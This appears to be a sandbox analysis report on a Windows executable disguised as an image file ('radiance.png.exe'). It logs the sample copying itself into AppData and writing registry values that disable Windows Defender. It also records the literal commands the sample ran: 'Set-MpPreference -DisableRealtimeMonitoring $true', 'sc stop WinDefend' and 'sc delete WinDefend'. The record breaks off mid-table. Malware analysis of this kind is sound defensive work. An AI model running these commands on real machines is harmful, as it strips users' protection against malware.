radiance.png.exe
Windows Exe (x86-32)
Created at 2019-05-16T17:08:00
Remarks (2/3)
(0x200000e): The overall sleep time of all monitored processes was truncated from "21 hours, 36 minutes, 10 seconds" to "1 minute, 34 seconds" to reveal dormant functionality.
(0x200003a): A task was rescheduled ahead of time to reveal dormant functionality.
Remarks
(0x200000c): The maximum memory dump size was exceeded. Some dumps may be missing in the report.
(0x200001f): Code in memory was overwritten during this analysis. Review corresponding VTI for more info.
Monitored Processes
Behavior Information - Grouped by Category
Process #1: radiance.png.exe
864
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\users\2xc7u663gxwc\desktop\radiance.png.exe |
| Command Line | "C:\Users\2XC7u663GxWc\Desktop\radiance.png.exe" |
| Initial Working Directory | C:\Users\2XC7u663GxWc\Desktop\ |
| Monitor | Start Time: 00:00:16, Reason: Analysis Target |
| Unmonitor | End Time: 00:00:57, Reason: Self Terminated |
| Monitor Duration | 00:00:40 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd50 |
| Parent PID | 0x61c (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D54
0x
D5C
0x
D60
0x
D64
0x
D68
0x
D74
0x
D80
0x
E34
0x
F34
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| radiance.png.exe | 0x00400000 | 0x00448FFF | Relevant Image | - | 32-bit | - |
|
|
|
| buffer | 0x00150000 | 0x00151FFF | First Execution | - | 32-bit | 0x00151140, 0x001512D0, ... |
|
|
|
| buffer | 0x003C0000 | 0x003C0FFF | First Execution | - | 32-bit | 0x003C0000 |
|
|
|
| buffer | 0x00450000 | 0x00450FFF | First Execution | - | 32-bit | 0x00450000 |
|
|
|
| buffer | 0x01A60000 | 0x01A8AFFF | First Execution | - | 32-bit | 0x01A77D1F, 0x01A78A78, ... |
|
|
|
Dropped Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\2XC7u663GxWc\Desktop\radiance.png.exe | 250.00 KB |
MD5:
5c163d92cb7b0b913b1e9fce3e179477
SHA1: 574aa8b8d8bc98cda8038f8a5084d36367e4ce82 SHA256: c8781c38c7a9b921049963a276513cf6057d85766e7517ff5eb6e4bc4d0c397b SSDeep: 6144:Kz0qq/ZdqMwdoXqTHBgVkVWp0UhmMNYWZ:vXqTHBguVdKmMCW |
|
|
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\2xc7u663gxwc\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-3727408139-63090477-3136880571-1000\a7ad97fe866c7f48db63edede97b2b9b_3912d7c0-2df4-4798-9de9-c60c58f001d5 | 1.03 KB |
MD5:
6a60611fe15b070e3e11b53bc3d9dc87
SHA1: 784e344f476e13ff693271bc985c40049afc1b9a SHA256: f7ccc163182308202c4c59dc5c6443be6df032ed5ec80f248ca0b4b61825898a SSDeep: 24:e0Kf5b6UwZYeKrPH4I4slxMm/rCnZwp5MVsJHjZ9:Wb6UwZhKrT4AxMM2Zwp2VsBjD |
|
|
| c:\users\2xc7u663gxwc\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-3727408139-63090477-3136880571-1000\a7ad97fe866c7f48db63edede97b2b9b_3912d7c0-2df4-4798-9de9-c60c58f001d5 | 1.03 KB |
MD5:
87a4844794b4d8228031077194c5f62d
SHA1: eb5b65b9fa18579b870d91d0b7b340b939b42946 SHA256: 714e64be4710d49ecc8995a532b080cd9af9ab9bc677d42b5ca22a003abf89de SSDeep: 24:e0Kf5b6UwfxF1wX6U2VMf0kYknnfvzkM9SSwZ+rciXMParI13owlmTbV6jE:Wb6UwfxEX6U2VMUknnDkLhZLi8PSI14b |
|
|
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Directory | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata | - |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
3 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Copy | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\tadiapce.exe | source_filename = C:\Users\2XC7u663GxWc\Desktop\radiance.png.exe |
|
1 |
Registry (13)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender | - |
|
1 | |
| Create Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications | - |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender | value_name = DisableAntiSpyware, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
2 | |
| Write Value | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | value_name = DisableBehaviorMonitoring, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | value_name = DisableOnAccessProtection, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | value_name = DisableOnRealtimeEnable, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | value_name = DisableIOAVProtection, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications | value_name = DisableNotifications, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Process (158)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | cmd | show_window = SW_HIDE |
|
1 | |
| Create | cmd | show_window = SW_HIDE |
|
1 | |
| Create | cmd | show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xeb8, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xedc, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xeec, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Enumerate Processes | - | - |
|
149 | |
| Enumerate Processes | - | - |
|
3 |
Module (38)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | Crypt32.dll | base_address = 0x75610000 |
|
4 | |
| Load | kernel32.dll | base_address = 0x76b10000 |
|
2 | |
| Load | advapi32.dll | base_address = 0x774c0000 |
|
2 | |
| Load | shell32.dll | base_address = 0x75bb0000 |
|
1 | |
| Load | ntdll.dll | base_address = 0x77330000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\users\2xc7u663gxwc\desktop\radiance.png.exe | base_address = 0x400000 |
|
5 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76b10000 |
|
1 | |
| Get Filename | - | process_name = c:\users\2xc7u663gxwc\desktop\radiance.png.exe, file_name_orig = C:\Users\2XC7u663GxWc\Desktop\radiance.png.exe, size = 255 |
|
1 | |
| Get Filename | KERNEL32.dll | process_name = c:\users\2xc7u663gxwc\desktop\radiance.png.exe, file_name_orig = C:\Users\2XC7u663GxWc\Desktop\radiance.png.exe, size = 260 |
|
1 | |
| Get Address | c:\users\2xc7u663gxwc\desktop\radiance.png.exe | function = ___CPPdebugHook, address_out = 0x40e13c |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x76b633d3 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Borland32, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CryptStringToBinaryA, address_out = 0x75645d77 |
|
4 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Wow64EnableWow64FsRedirection, address_out = 0x76b98bc9 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x774d469d |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyW, address_out = 0x774d1514 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegOpenKeyExW, address_out = 0x774d468d |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegSetValueExW, address_out = 0x774d14d6 |
|
1 | |
| Get Address | c:\windows\system32\shell32.dll | function = ShellExecuteA, address_out = 0x75df7078 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptAcquireContextA, address_out = 0x774c91dd |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptImportKey, address_out = 0x774cc532 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptEncrypt, address_out = 0x774e779b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualAlloc, address_out = 0x76b62fb6 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = memcpy, address_out = 0x77364cc0 |
|
1 |
Service (7)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | service_name = WinDefend |
|
1 | |
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
3 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | Squirrel Shootout by Brenton Andrew Saunders | class_name = Squirrel Shootout by Brenton Andrew Saunders, wndproc_parameter = 0 |
|
1 |
Keyboard (111)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Read | virtual_key_code = VK_NUMLOCK, result_out = 1 |
|
31 | |
| Read | virtual_key_code = VK_LEFT, result_out = 0 |
|
10 | |
| Read | virtual_key_code = VK_RIGHT, result_out = 0 |
|
10 | |
| Read | virtual_key_code = VK_SPACE, result_out = 0 |
|
10 | |
| Read | virtual_key_code = VK_RETURN, result_out = 0 |
|
10 | |
| Read | virtual_key_code = VK_NUMPAD4, result_out = 0 |
|
10 | |
| Read | virtual_key_code = VK_NUMPAD6, result_out = 0 |
|
10 | |
| Read | virtual_key_code = VK_ADD, result_out = 0 |
|
10 | |
| Read | virtual_key_code = VK_SUBTRACT, result_out = 0 |
|
10 |
System (514)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 1 milliseconds (0.001 seconds) |
|
256 | |
| Sleep | duration = 50 milliseconds (0.050 seconds) |
|
1 | |
| Sleep | duration = 3 milliseconds (0.003 seconds) |
|
1 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
2 | |
| Sleep | duration = 500 milliseconds (0.500 seconds) |
|
1 | |
| Get Time | type = Ticks, time = 10878152 |
|
129 | |
| Get Time | type = Ticks, time = 10878168 |
|
120 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Get Info | type = Hardware Information |
|
1 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #2: cmd.exe
60
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true |
| Initial Working Directory | C:\Users\2XC7u663GxWc\Desktop\ |
| Monitor | Start Time: 00:00:26, Reason: Child Process |
| Unmonitor | End Time: 00:00:45, Reason: Self Terminated |
| Monitor Duration | 00:00:19 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd6c |
| Parent PID | 0xd50 (c:\users\2xc7u663gxwc\desktop\radiance.png.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D70
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\2XC7u663GxWc\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 232, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | os_pid = 0xdd0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4a050000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76b10000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76b624c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x76b4ac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76b53ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76b62732 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-05-14 15:30:40 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10879119 |
|
1 | |
| Get Time | type = Performance Ctr, time = 10100670165 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\2XC7u663GxWc\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #3: cmd.exe
60
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /c sc stop WinDefend |
| Initial Working Directory | C:\Users\2XC7u663GxWc\Desktop\ |
| Monitor | Start Time: 00:00:26, Reason: Child Process |
| Unmonitor | End Time: 00:00:28, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd78 |
| Parent PID | 0xd50 (c:\users\2xc7u663gxwc\desktop\radiance.png.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D7C
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\2XC7u663GxWc\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 120, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\sc.exe | os_pid = 0xdc8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4a050000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76b10000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76b624c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x76b4ac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76b53ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76b62732 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-05-14 15:30:40 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10879275 |
|
1 | |
| Get Time | type = Performance Ctr, time = 10116240974 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\2XC7u663GxWc\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000005 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #4: cmd.exe
60
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /c sc delete WinDefend |
| Initial Working Directory | C:\Users\2XC7u663GxWc\Desktop\ |
| Monitor | Start Time: 00:00:26, Reason: Child Process |
| Unmonitor | End Time: 00:00:28, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd94 |
| Parent PID | 0xd50 (c:\users\2xc7u663gxwc\desktop\radiance.png.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D98
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\2XC7u663GxWc\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 128, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\sc.exe | os_pid = 0xdc0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4a050000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76b10000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76b624c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x76b4ac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76b53ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76b62732 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-05-14 15:30:40 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10879213 |
|
1 | |
| Get Time | type = Performance Ctr, time = 10110681499 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
